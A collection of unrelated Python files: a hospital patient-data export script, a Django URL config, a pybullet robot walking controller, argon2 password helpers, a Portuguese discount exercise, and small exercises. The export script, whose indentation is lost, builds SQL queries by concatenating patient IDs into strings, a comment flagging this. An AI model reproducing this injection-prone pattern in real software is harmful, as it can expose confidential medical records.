matrix = [list("" for i in range(col_max)) for i in range(row_max+2)]
for ii in range(len(patient_id)):
patient = patient_id[ii]
kk = 0
for i in range(base_page_max):
page = "base_" + str(i)
sql = "SELECT name,sex,age,marriage,site,stage,surgery,radiotherapy,chemotherapy FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(base_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(lab_page_max):
page = "lab_" + str(i)
sql = "SELECT CEA,CA199 FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(lab_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(pathology_page_max):
page = "pathology_" + str(i)
sql = "SELECT patho_diagnosis,lym_vas_invasion,tot_lymph_node,deep,pni,pos_lymph_node FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(pathology_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(surgery_page_max):
page = "surgery_" + str(i)
sql = "SELECT resection_way FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(surgery_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(chemotherapy_page_max):
page = "chemotherapy_" + str(i)
sql = "SELECT chemo_way,chemo_way_other,last_chemo,chemo_time_0,chemo_time_1,chemo_time_2,chemo_way_0,chemo_way_1,chemo_way_2,desc_0,desc_1,desc_2 FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(chemotherapy_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(radiotherapy_page_max):
page = "radiotherapy_" + str(i)
sql = "SELECT radio_count,radio_start,radio_end FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(radiotherapy_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(follow_up_page_max):
page = "follow_up_" + str(i)
sql = "SELECT recurrance FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(follow_up_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
col_names_all = ["patient_id"]
col_labels_all = ["病例号"]
for i in range(base_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(base_col_names)):
col_name = base_col_names[j]
col_label = base_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(lab_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(lab_col_names)):
col_name = lab_col_names[j]
col_label = lab_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(pathology_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(pathology_col_names)):
col_name = pathology_col_names[j]
col_label = pathology_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(surgery_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(surgery_col_names)):
col_name = surgery_col_names[j]
col_label = surgery_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(chemotherapy_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(chemotherapy_col_names)):
col_name = chemotherapy_col_names[j]
col_label = chemotherapy_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(radiotherapy_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(radiotherapy_col_names)):
col_name = radiotherapy_col_names[j]
col_label = radiotherapy_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(follow_up_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(follow_up_col_names)):
col_name = follow_up_col_names[j]
col_label = follow_up_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for j in range(col_max):
matrix[0][j] = col_labels_all[j]
matrix[1][j] = col_names_all[j]
for i in range(row_max):
matrix[i+2][0] = patient_id[i]
for i in range(row_max+2):
for j in range(col_max):
sheet_1.write(i, j, label=matrix[i][j])
# save the file
new_file = 'download/data.xls'
if os.path.exists(new_file):
os.remove(new_file)
file_new.save(new_file)
getData()
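# Hedged note (not part of the original script): the queries above interpolate
# patient_id into SQL by string concatenation. MySQLdb supports parameterized
# queries for values (table names still have to be validated separately), e.g.:
#
# sql = "SELECT name,sex,age FROM base_0 WHERE patient_id=%s"
# cur.execute(sql, (patient,))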
|
from django.urls import include, path
from .views import login, logoutFlutter, daftar, json_fb, fb_json, feedback_json, ListFeedback, DetailFeedback
urlpatterns = [
path('', login, name='loginflutter'),
path('logout', logoutFlutter, name='logoutflutter'),
path('daftar', daftar, name='daftarflutter'),
# path('json_fb', feedback_json, name='json_fb'),
path('json_fb', ListFeedback.as_view()),
path('<int:pk>/', DetailFeedback.as_view())
]
|
#!/usr/bin/env python
import time
from threading import Thread
import pybullet as p
from .core.op3 import OP3
from .walking.wfunc import WFunc
class Walker(OP3):
"""
Class for making Darwin walk
"""
def __init__(self, x_vel=1, y_vel=0, ang_vel=0, interval=0.0054, *args, **kwargs):
OP3.__init__(self, *args, **kwargs)
self.running = False
self.velocity = [0, 0, 0]
self.walking = False
self.x_vel = x_vel
self.y_vel = y_vel
self.ang_vel = ang_vel
self.sld_x_vel = p.addUserDebugParameter("x_vel", -10, 10, x_vel)
self.sld_y_vel = p.addUserDebugParameter("y_vel", -10, 10, y_vel)
self.sld_ang_vel = p.addUserDebugParameter("ang_vel", -10, 10, ang_vel)
self.wfunc = WFunc()
# ~ self.ready_pos=get_walk_angles(10)
self.ready_pos = self.wfunc.get(True, 0, [0, 0, 0])
self.ready_pos.update({"r_sho_pitch": 0, "l_sho_pitch": 0,
"r_sho_roll": -1.0, "l_sho_roll": 1.0,
"r_el": 0.5, "l_el": -0.5})
self._th_walk = None
self.sld_interval = p.addUserDebugParameter("step_interval", 0.001, 0.01, interval)
self.save_button = p.addUserDebugParameter("save parameters", 1, -1, 1)
self.check_gui_th()
def cmd_vel(self, vx, vy, vt):
print("cmdvel", (vx, vy, vt))
self.start()
self.set_velocity(vx, vy, vt)
def init_walk(self):
"""
If not there yet, go to initial walk position
"""
if self.get_dist_to_ready() > 0.02:
self.set_angles_slow(self.ready_pos)
def start(self):
if not self.running:
print("Start Walking")
self.running = True
self.init_walk()
self._th_walk = Thread(target=self._do_walk)
self._th_walk.start()
self.walking = True
def stop(self):
if self.running:
self.walking = False
print("Waiting for stopped")
while self._th_walk is not None:
time.sleep(0.1)
print("Stopped")
self.running = False
def set_velocity(self, x, y, t):
self.velocity = [x, y, t]
def check_gui_th(self):
def check_gui():
while True:
curr_x_vel = p.readUserDebugParameter(self.sld_x_vel)
curr_y_vel = p.readUserDebugParameter(self.sld_y_vel)
curr_ang_vel = p.readUserDebugParameter(self.sld_ang_vel)
if self.x_vel != curr_x_vel or \
self.y_vel != curr_y_vel or \
self.ang_vel != curr_ang_vel:
self.x_vel = curr_x_vel
self.y_vel = curr_y_vel
self.ang_vel = curr_ang_vel
self.velocity = [self.x_vel, self.y_vel, self.ang_vel]
self.camera_follow(distance=0.5)
time.sleep(0.01)
Thread(target=check_gui).start()
def _do_walk(self):
"""
Main walking loop, smoothly update velocity vectors and apply corresponding angles
"""
# Global walk loop
n = 50
phrase = True
i = 0
self.current_velocity = [0, 0, 0]
while self.walking or i < n or self.is_walking():
if not self.walking:
self.velocity = [0, 0, 0]
elif not self.is_walking() and i == 0: # Do not move if nothing to do and already at 0
self.update_velocity(self.velocity, n)
time.sleep(p.readUserDebugParameter(self.sld_interval) / self.sim_speed)
continue
x = float(i) / n
angles = self.wfunc.get(phrase, x, self.current_velocity)
self.update_velocity(self.velocity, n)
self.set_angles(angles)
i += 1
if i > n:
i = 0
phrase = not phrase
time.sleep(p.readUserDebugParameter(self.sld_interval) / self.sim_speed)
self._th_walk = None
def is_walking(self):
e = 0.02
for v in self.current_velocity:
if abs(v) > e: return True
return False
def rescale(self, angles, coef):
z = {}
for j, v in angles.items():
offset = self.ready_pos[j]
v -= offset
v *= coef
v += offset
z[j] = v
return z
def update_velocity(self, target, n):
a = 3 / float(n)
b = 1 - a
self.current_velocity = [a * t + b * v for (t, v) in zip(target, self.current_velocity)]
def get_dist_to_ready(self):
angles = self.get_angles()
return get_distance(self.ready_pos, angles)
def reset(self):
self.stop()
p.resetBasePositionAndOrientation(self.robot, self.op3StartPos, self.op3StartOrientation)
self.start()
self.set_velocity(self.x_vel, self.y_vel, self.ang_vel)
def interpolate(anglesa, anglesb, coefa):
z = {}
joints = anglesa.keys()
for j in joints:
z[j] = anglesa[j] * coefa + anglesb[j] * (1 - coefa)
return z
def get_distance(anglesa, anglesb):
d = 0
joints = anglesa.keys()
if len(joints) == 0: return 0
for j in joints:
d += abs(anglesb[j] - anglesa[j])
d /= len(joints)
return d
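# Illustrative note (not part of the original file): update_velocity() above is an
# exponential blend, new = a*target + (1 - a)*current with a = 3/n, so the commanded
# velocity converges smoothly toward the target over roughly n/3 walk sub-steps, e.g.:
#
# target, current, n = [1.0, 0.0, 0.0], [0.0, 0.0, 0.0], 50
# a = 3 / float(n)
# for _ in range(n):
#     current = [a * t + (1 - a) * v for t, v in zip(target, current)]
# print(current)   # roughly [0.95, 0.0, 0.0] after one full phase of n sub-steps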
|
"""
Legacy mid-level functions.
"""
from __future__ import absolute_import, division, print_function
import os
from ._password_hasher import (
DEFAULT_HASH_LENGTH,
DEFAULT_MEMORY_COST,
DEFAULT_PARALLELISM,
DEFAULT_RANDOM_SALT_LENGTH,
DEFAULT_TIME_COST,
)
from .low_level import Type, hash_secret, hash_secret_raw, verify_secret
def hash_password(password, salt=None,
time_cost=DEFAULT_TIME_COST,
memory_cost=DEFAULT_MEMORY_COST,
parallelism=DEFAULT_PARALLELISM,
hash_len=DEFAULT_HASH_LENGTH,
type=Type.I):
"""
Legacy alias for :func:`hash_secret` with default parameters.
.. deprecated:: 16.0.0
Use :class:`argon2.PasswordHasher` for passwords.
"""
if salt is None:
salt = os.urandom(DEFAULT_RANDOM_SALT_LENGTH)
return hash_secret(
password, salt, time_cost, memory_cost, parallelism, hash_len, type
)
def hash_password_raw(password, salt=None,
time_cost=DEFAULT_TIME_COST,
memory_cost=DEFAULT_MEMORY_COST,
parallelism=DEFAULT_PARALLELISM,
hash_len=DEFAULT_HASH_LENGTH,
type=Type.I):
"""
Legacy alias for :func:`hash_secret_raw` with default parameters.
.. deprecated:: 16.0.0
Use :class:`argon2.PasswordHasher` for passwords.
"""
if salt is None:
salt = os.urandom(DEFAULT_RANDOM_SALT_LENGTH)
return hash_secret_raw(
password, salt, time_cost, memory_cost, parallelism, hash_len, type
)
def verify_password(hash, password, type=Type.I):
"""
Legacy alias for :func:`verify_secret` with default parameters.
.. deprecated:: 16.0.0
Use :class:`argon2.PasswordHasher` for passwords.
"""
return verify_secret(hash, password, type)
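# Illustrative usage sketch (not part of the original module): round-tripping a
# password through the deprecated helpers above. Secrets must be bytes here.
if __name__ == '__main__':
    encoded = hash_password(b"correct horse battery staple")
    print(encoded)                                                     # $argon2i$... encoded hash
    print(verify_password(encoded, b"correct horse battery staple"))  # True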
|
"""Viajar é bom demais! Uma agência de viagens está propondo uma estratégia para alavancar as vendas após os impactos da pandemia do coronavírus.
A empresa ofertará descontos progressivos na compra de pacotes, dependendo do número de viajantes que estão no mesmo grupo e moram na mesma residência.
Para ajudar a tornar esse projeto real, você deve criar um algoritmo que receba o VALOR BRUTO do pacote, a CATEGORIA DOS ASSENTOS no vôo e a
QUANTIDADE DE VIAJANTES que moram em uma mesma casa e calcule os descontos de acordo com a tabela abaixo. O programa deverá exibir o valor BRUTO DA VIAGEM
(o mesmo que foi digitado), o VALOR DO DESCONTO, o VALOR LÍQUIDO DA VIAGEM (valor bruto menos os descontos) e o VALOR MÉDIO POR VIAJANTE."""
bruto = float(input("Digite o valor bruto do pacote: R$ "))
categoria = str(input("Digite a categoria dos assentos no vôo: ")).upper()
viajantes = int(input("Digite a quantidade de viajantes: "))
if categoria == 'ECONOMICA' and viajantes == 2:
desconto = bruto * 0.03
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'ECONOMICA' and viajantes == 3:
desconto = bruto * 0.04
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'ECONOMICA' and viajantes >= 4:
desconto = bruto * 0.05
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'EXECUTIVA' and viajantes == 2:
desconto = bruto * 0.05
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'EXECUTIVA' and viajantes == 3:
desconto = bruto * 0.07
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'EXECUTIVA' and viajantes >= 4:
desconto = bruto * 0.08
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'PRIMEIRA CLASSE' and viajantes == 2:
desconto = bruto * 0.10
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'PRIMEIRA CLASSE' and viajantes == 3:
desconto = bruto * 0.15
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'PRIMEIRA CLASSE' and viajantes >= 4:
desconto = bruto * 0.20
liquido = bruto - desconto
    media = liquido/viajantes
else:
    # Fallback: no discount when the category is not recognised or the group has fewer than 2 travelers.
    desconto = 0.0
    liquido = bruto
    media = liquido/viajantes if viajantes else 0.0
print("O valor bruto da viagem é de R$ {:.2f}.".format(bruto))
print("O valor do desconto para {} viajantes na categoria {} é de R$ {:.2f}.".format(viajantes, categoria, desconto))
print("O valor líquido da viagem é de R$ {:.2f}.".format(liquido))
print("O valor médio por viajante é de R$ {:.2f}.".format(media))
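# Illustrative refactor sketch (not part of the exercise as stated): the same
# discount table expressed as data, which avoids repeating the three-line
# calculation in every branch. Rates mirror the if/elif chain above.
#
# TABELA = {'ECONOMICA': {2: 0.03, 3: 0.04, 4: 0.05},
#           'EXECUTIVA': {2: 0.05, 3: 0.07, 4: 0.08},
#           'PRIMEIRA CLASSE': {2: 0.10, 3: 0.15, 4: 0.20}}
# taxa = TABELA.get(categoria, {}).get(min(viajantes, 4), 0.0)
# desconto = bruto * taxa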
|
def print_hello_world():
print('Hello World!')
def my_print(msg):
print(msg)
# my_print('Hello Cyber!')
def add(a, b):
return a + b
a = 5
b = 3
print(f'the sum of {a} + {b} is {add(a,b)}')
c = 7
if add(a,b) > c:
print(f'{add(a,b)} is greater than {c}')
elif add(a,b) > 10:
print(f'{add(a,b)} is greater than 10')
else:
print('Other')
for i in range(10):
print(i * 10)
|
class Solution(object):
def spiralOrder(self, matrix):
if not matrix:
return []
t, b, l, r, d = 0, len(matrix) - 1, 0, len(matrix[0]) - 1, 0
res = []
while t <= b and l <= r:
if d == 0:
res.extend(matrix[t][l : r + 1])
t += 1
elif d == 1:
res.extend(e[r] for e in matrix[t : b + 1])
r -= 1
elif d == 2:
res.extend(matrix[b][l : r + 1][::-1])
b -= 1
elif d == 3:
res.extend(e[l] for e in matrix[t : b + 1][::-1])
l += 1
d = (d + 1) % 4
return res
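# Illustrative usage sketch (not part of the original solution): traverse a 3x3
# matrix clockwise starting from the top-left corner.
if __name__ == '__main__':
    grid = [[1, 2, 3],
            [4, 5, 6],
            [7, 8, 9]]
    print(Solution().spiralOrder(grid))  # [1, 2, 3, 6, 9, 8, 7, 4, 5]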
|